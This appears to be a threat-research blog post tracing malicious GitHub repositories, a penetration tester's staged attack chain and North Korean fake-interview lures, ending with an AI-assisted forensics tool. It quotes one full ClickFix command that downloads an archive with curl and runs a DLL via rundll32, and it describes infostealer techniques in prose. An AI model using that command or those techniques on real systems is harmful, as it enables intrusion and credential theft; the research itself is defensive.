Introduction
Many, many months ago, a GitHub repository belonging to a threat actor that had been targeting a company operating in the airport management sector since September 2024 caught my attention. Since I did not have the chance to examine this repository, which showed a considerable amount of activity, in detail at the time, I cloned it and set it aside together with all of its change history (commits) in case I needed it later.
Months later, while going through what I had on hand for security research, this repository caught my attention again, and this time I decided to take a closer look.
Analysis
As I began randomly reviewing all the files that had been uploaded to and deleted from the repository, along with the changes that had been made, a REG file named Fix_ PDF_FileType_Handler 1, uploaded on June 13, 2025, caught my attention.
This file registered a ping:// URI protocol handler in the Windows operating system. When such a link was opened, it launched a hidden PowerShell command that downloaded llvmfunc.dll from the https://github.com/doe17409 GitHub repository, hid the file, and then executed it via Windows’ rundll32.exe utility. In short, it was a suspicious method designed to download and execute a remote malicious component (payload).
When I tried to download llvmfunc.dll, I realized that the repository had been deleted, so I could not access the file. I then began examining the files in the main repository and saw that a file with this name existed inside Employee_Performance_Summary_2025Q21.zip, which appeared under the commit summary e85f596132e9ee26c3922f320d5ca4f3b403604b.
When I analyzed the Employee_Performance_Summary_2025Q21.lnk file with the lnkparse tool, I saw that although it appeared to the user as if it were opening a normal document or PDF, it was actually executing a hidden PowerShell command in the background. The command extracted the ZIP file in the user’s Downloads folder, hid the llvmfunc.dll file inside it, and then executed the test function inside the DLL through rundll32.exe.
When I examined this DLL file with the strings utility, the string HellsHazzard.dll immediately caught my attention.
When I searched Google for the word HellsHazzard, I learned that it was a tool developed by Maldev Academy to bypass the API monitoring mechanisms of security products such as EDR solutions.
When I analyzed the test function with the radare2 reverse engineering framework, the function appeared to download a PNG file from the GitHub repository, process the hidden data inside it in memory, and execute a second-stage payload. (Since the PNG file had been removed from the repository, I did not have the chance to fully verify this.) Meanwhile, to avoid raising the user’s suspicion, a real PDF file was opened in Microsoft Edge in full-screen mode.
While searching the more recent commits to see whether any PNG files were present, another file named pms.html, dated November 24, 2025, in a different repository caught my eye. When I examined this file, I saw a command line embedded inside JavaScript.
Using the ClickFix technique, the user was asked to execute this command, which started a hidden command chain running in the background on Windows. After switching to the user’s Documents folder, it downloaded an archive named t.tar.gz from GitHub with curl, extracted it with the tar utility, and then executed the resulting t.dll file through rundll32.exe by calling the exported function named Cloudflare_ID_35129506721.
```text
cONHoSt cONhosT CmD /c start "" /min CmD /c "cD %USERPROFILE%\Documents & CuRl https://raw.githubusercontent.com/xxxxx/t/refs/heads/main/t.tar.gz -o t.taR.Gz & tAr -xzf t.taR.Gz & sTaRt RuNdLL32.exe t.dll,Cloudflare_ID_35129506721"
```
Before reverse engineering the t.dll file, I remembered that there was a file named tsss_cat.png in the t repository. Since this threat actor seemed interested in Maldev Academy tools, I wondered whether they might have used a tool specifically developed for PNG files from the Maldev-Academy GitHub repository. As I browsed through the repository, the EmbedPayloadInPng tool caught my attention.
When I examined another component of this project, the tool that extracts and runs encrypted malicious code (payload) from a PNG file (FetchPayloadFromPng), I saw that the tsss_cat.png file matched what was described in https://github.com/Maldev-Academy/EmbedPayloadInPng. When I analyzed the PNG file with 010 Editor, it was clear that there was something devilish going on in the IDAT section.
After decrypting the malicious code inside tsss_cat.png with the FetchPayloadFromPng tool and examining it with the strings utility, I saw that it was Havoc Framework, an open-source tool developed for red team operations and attack simulation.
As I browsed through the files in the repository a little more, I saw that the threat actor had at one point also attempted to steal domain passwords belonging to users at the targeted company.
Who Is This Threat Actor?
While I was starting to appreciate the threat actor’s seemingly endless persistence, I also began to seriously wonder who this threat actor was and which group they belonged to.
The fact that some of the change files in the snapshots folder had Turkish file names such as Ekran görüntüsü 2025-06-13 145132.png strengthened the possibility that the threat actor was Turkish.
Hocus Pocus
When I looked at the GitHub interface, the only information about the person who had uploaded these files was a username. Since I knew that Git objects contained more than that, I ran the git log --format=fuller command in the t folder. Instead of a threat actor, I found myself looking at a penetration testing specialist working for a Turkey-based cybersecurity consulting and services company. :)
Of course, due to the developments in artificial intelligence today, we can no longer fully trust what we see or hear, so I felt the need to contact this specialist and verify the situation. As a result of the response I received, I learned that this was part of a long-running penetration testing engagement and closed this chapter.
Conversation (translated from Turkish):
Mert: Hi X, how are you?
Quick question — weren’t you using the github.com/[redacted] account for penetration testing purposes? I just wanted to ask whether this was something you were aware of.
Pentester: Hello. Yes, but I remember that page being shut down.
Oh No, Lazarus!
As the months went by, in May 2026 two posts shared on LinkedIn one week apart caught my attention.
The first was Yaman URAL’s post, in which he shared that he had been targeted by scammers through a fake job offer and tried to warn his connections against similar attempts.
Conversation (translated from Turkish):
Let me introduce you to scammers!
They came again with another job offer. But this time they were much better prepared. Either they compromised someone’s account, or they put serious effort into this operation. The connection request came from someone who had mutual contacts with me. Those mutual connections are quite well-known and trusted people in Turkey’s AI and crypto ecosystem.
The company offering the job supposedly was a legitimate AI and crypto company based in Dubai. They scheduled a Google Meet interview for 10 AM today. I started speaking with the person in the photo (“Simon”). After some casual conversation, as expected, they sent me a Git repository.
They started directing me to share my screen, clone the repository and execute it.
I told them I wouldn’t immediately run it because it didn’t seem safe, and started searching the code for Base64-like variables. It didn’t take long to find them. Meanwhile Simon was watching my screen. The moment I said, “Let’s decode this token,” the call suddenly ended.
I recorded the entire session on video :) And of course, the “token” was not really a token.
Having mutual connections on LinkedIn creates a significant trust factor. Without realizing it, we may end up helping scammers purely out of good intentions or networking purposes.
Be careful.
Less than a week later, Ege ÇIKRIKÇI, in his post, explained to his connections with technical details how he had been hacked by a threat actor.
Conversation (translated from Turkish):
Dear developer friends, please be extremely careful.
I got hacked on Monday. A new attack method actively targeting developers and software-based product teams is currently being used. Let me explain.
The tactic is called: Contagious Interview
A LinkedIn profile claiming to be associated with a Switzerland-based company called Knot Capital contacted me.
They explained that they had been developing a project for some time, but that their software team was too expensive and too slow, and that they were looking for a team in Turkey.
After discussing the business side and goals of the project for about a day, they told me I could review the project on Friday.
They sent me the project inside a ZIP archive via Google Drive. The old guy insisted on not using Git, but I didn’t want to push back too hard at that moment.
Actually, I had a separate computer specifically for these types of tasks. But that computer became inaccessible because the modem at the office had been unplugged on Friday.
So I thought:
“I’ll just open it on my personal computer, quickly look through the code without running npm or anything, and then on Monday I’ll open it on the other machine and run it there.”
Monday came. I went to the office. I turned on the computer.
I thought:
“Let me upload this project to Git so I can open it on the other computer later, and then I’ll delete it from my personal machine.”
The moment I pushed it to Git, they compromised my system through the hooks hidden inside the .git directory.
And before I even realized what was happening, they had been running around inside my system for 2–3 hours.
The attacker used Fooocus installed on my computer to perform OCR and even inspected the images on my desktop.
At that point, the private key stored inside Apple Notes was also compromised. They emptied my wallet, reviewed the photos stored on my computer, accessed VPN configurations for company servers I had recently set up, and I had to rotate all of my passwords.
The SAs [system administrators] of all my projects had to reset everything.
From what I observed in the logs, this was not only an automated malware infection — they were also manually executing commands through the terminal.
Summary:
Do not push any code to Git unless you completely trust its source. In fact, do not even open it if possible, but pushing it to Git is clearly not safe either.
I believe many of you may soon be targeted through various pretexts:
code interviews, project reviews, investment opportunities, consulting offers, or recruitment scenarios.
Remember:
Contagious Interview is currently very active. During the last week alone, while investigating these incidents, I learned that they have been compromising new victims every 4–5 hours.
Technically speaking:
After git checkout, the following hook executes automatically:
.git/hooks/post-checkout
Then the obfuscated JavaScript payload hidden inside .git/hooks/update.sample starts running.
Payload size: 3.5 MB
Afterwards, as you can imagine, it connects to a C2 server and continues from there.
After contacting both of them and obtaining the GitHub repository information and files, I decided to get to work.
First, I downloaded the repository information I received from Yaman URAL (https://github.com/roamanbuild/OnyxVerse) as I had done in my previous research and ran the git log --format=fuller command. When I began searching Google for the email addresses that appeared, the email address [email protected] led me to AllSecure’s article titled North Korea Tried to Hack Our CEO Through a Fake Job Interview on LinkedIn.
When I examined the technical details of the article, the tactics and techniques of the threat actor described there overlapped to a very large extent with the person or people who had targeted Yaman URAL. Accordingly, unlike ordinary scammers, those who targeted Yaman URAL were the North Korean Lazarus group, known to be much more organized and dangerous in the cybercrime world! Based on this information, I immediately informed Yaman URAL and his connections about the matter.
Conversation (translated from Turkish):
The individuals targeting you appear to overlap 100% with the threat actor mentioned in the article below.
This looks far beyond a simple scam attempt — it appears to be part of a long-running operation active since at least November 15.
The operation is very likely linked to North Korean threat actors.
The Lazarus Group is regarded as one of the most well-known and dangerous state-sponsored hacking groups in the cybersecurity world.
According to security researchers and Western intelligence agencies, the group is linked to North Korea’s intelligence structures and has been actively operating since around 2009. Also tracked under different names such as “Hidden Cobra”, “APT38”, “Guardians of Peace”, and “ZINC”, the Lazarus Group is known for cyber espionage, financial theft, ransomware operations, and attacks against critical infrastructure.
The group has gained notoriety especially for the major attack against Sony Pictures in 2014, the WannaCry ransomware campaign that affected hundreds of thousands of systems worldwide in 2017, and cyberattacks against cryptocurrency exchanges in recent years that have resulted in billions of dollars in losses.
According to experts, Lazarus Group’s main objectives include generating financial resources for the North Korean regime, bypassing sanctions, collecting intelligence, and conducting geopolitical operations. Today, the Lazarus Group is considered one of the world’s most advanced APT (Advanced Persistent Threat) groups due to its advanced social engineering techniques, custom malware, and sophisticated operational capabilities.
AI to the Rescue
In suspicious cases like the ones above, going through GitHub repository records and changes one by one to reveal the bigger picture has become tedious work in today’s AI era. For this reason, I began thinking about what I could do to simplify and speed up such investigations, both in my personal security research and in the threat research we conduct at SOCRadar.
As someone who works with Claude Code almost every day, I began to imagine giving a GitHub repository to the platform I had specially developed for my threat research in my spare time, having it download the repository, extract IOCs, then analyze both the IOCs and the source code with Gemini, look for backdoors, search through threat research articles and reports, and, if it found a match, evaluate the TTPs (tactics, techniques, and procedures) and try to associate them with a threat actor.
To bring this idea to life, I spent one Sunday working with Claude Code on AI-assisted coding, and by that evening I had a tool that could analyze GitHub repositories and files: GitHub Repo Forensics.
Then Things Escalated
For testing, I first gave the tool the https://github.com/roamanbuild/OnyxVerse repository to analyze. Both the threat actor attribution and the backdoor analysis matched the findings in AllSecure’s article.
The analysis revealed that this GitHub repository contained a malicious backdoor hidden inside the authentication mechanism. The malware behaved like an infostealer by exfiltrating all environment variables (process.env) to a remote command-and-control (C2) server, then downloading and executing additional malicious JavaScript payloads directly in memory.
In particular, the use of new Function() to dynamically execute remotely fetched code allowed the attackers to deliver second-stage payloads to the system at any time. In addition, the prepare script inside the package.json file ensured persistence by automatically launching the malicious code in the background even if the victim simply executed the npm install command.
During the analysis, several functions designed to exfiltrate sensitive information such as AWS access keys, API keys, database connection strings and similar credentials were identified, while the attackers were also observed attempting to hide the command and control endpoint using Base64 encoding.
Furthermore, the intentionally flawed implementation of the asynchronous validateApiKey() function ensured that the malicious code execution would not be blocked even if the verification process failed.
When it was time to have the tool analyze the file I received from Ege ÇIKRIKÇI (AI-Powered_RWA_Finance_Platform.zip), the findings Ege mentioned in his post (the triggered hooks: .git/hooks/post-checkout, .git/hooks/update.sample) matched the backdoor analysis results.
When the hidden code in the .git/hooks/update.sample file was decoded, it turned out to be an infostealer malware also referenced in multiple sources (#1, #2, #3).
The analyzed malicious JavaScript sample stood out as an advanced Node.js-based infostealer.
While the code contained functions targeting saved session and password data from Chrome, Edge, Brave, Opera, and Chromium-based browsers, it also systematically collected local storage directories belonging to cryptocurrency wallet extensions such as MetaMask, Phantom, Keplr, Exodus, and others.
The malicious code also attempted to decrypt passwords stored in browsers by using Windows DPAPI, macOS Keychain, and Linux Secret Service mechanisms.
In addition, it was designed to search for sensitive files such as .env, .pem, .pfx, SSH keys, cryptocurrency wallet recovery phrases (seed phrases), API keys, and financial documents, and upload them to command-and-control (C2) servers belonging to the threat actors.
The fact that the code could specifically detect WSL (Windows Subsystem for Linux) environments and attempted to access Windows user profiles through the /mnt/c/Users/ path also showed that the attackers were intentionally targeting developer systems and hybrid working environments.
The threat actor attribution also aligned with other sources, and once again the signs pointed to the Lazarus Group.
Conclusion
This research once again showed us that attackers are no longer merely developing malware; they also know very well how developers work, which tools they use, which technologies they are interested in, and how trust relationships are formed.
Technical interview processes, in particular, seem to have become an operational playground not only for developers, but also for threat actors.
For this reason, we need to approach not only unknown software and applications with suspicion, but also:
- GitHub repositories,
- Git hooks,
- scripts and shortcut files inside ZIP archives,
- demo projects that are described as “run locally”,
- and even technical interview processes.
On the other hand, thanks to this research, as a cybersecurity researcher, I developed a new tool that will both speed up and simplify my analysis processes. At the same time, this tool has also become part of the SOCRadar ecosystem.
I would like to sincerely thank Yaman URAL and Ege ÇIKRIKÇI, whom I contacted during this research, for generously sharing the technical details they had and contributing to this work.
Hope to see you in the following articles.
Indicators of Compromise (IOCs)